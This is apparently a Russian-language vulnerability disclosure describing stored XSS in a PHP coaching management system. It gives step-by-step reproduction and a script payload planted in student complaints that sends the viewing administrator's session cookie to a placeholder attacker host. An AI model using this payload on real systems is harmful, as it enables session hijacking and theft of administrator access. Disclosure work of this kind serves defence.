
Доказательство концепции эксплуатации хранимого XSS (CWE-79) в PHP-системе управления коучингом, демонстрирующее перехват сессии и повышение привилегий от студента до администратора через кражу cookie.
Система управления репетиторством на PHP (Code-Projects.org) https://code-projects.org/coaching-management-system-in-php-with-source-code/
Неизвестно (производитель не предоставил информацию о версии; протестировано на последней доступной версии с Code-Projects.org по состоянию на апрель 2026 года)
CWE-79: Некорректная нейтрализация входных данных при генерации веб-страницы (хранимый межсайтовый скриптинг)
Приложение не выполняет надлежащую очистку вводимых пользователем данных в функциональности жалоб и ответов. Вредоносный JavaScript, внедрённый пользователем с низкими привилегиями, сохраняется и выполняется при просмотре пользователями с более высокими привилегиями, такими как администраторы или преподаватели.
Кроме того, функциональность ответов также уязвима, что позволяет администраторам или преподавателям внедрять JavaScript, который выполняется в сессиях студентов.
Это приводит к хранимой XSS-уязвимости, затрагивающей несколько ролей пользователей.
Войдите как студент
Перейдите к:
/modules/student/complaint.php

Отправьте жалобу со следующей полезной нагрузкой:
<script>
new Image().src="http://ATTACKER-IP:PORT/?c="+document.cookie;
</script>

Войдите как администратор
Перейдите к:
/modules/admin/incomingcomplaint.php

Когда администратор просматривает жалобу, полезная нагрузка выполняется автоматически
Cookie сессии администратора отправляется на сервер, контролируемый атакующим
Используйте украденный cookie сессии, чтобы перехватить сессию администратора

Серьёзность: CRITICAL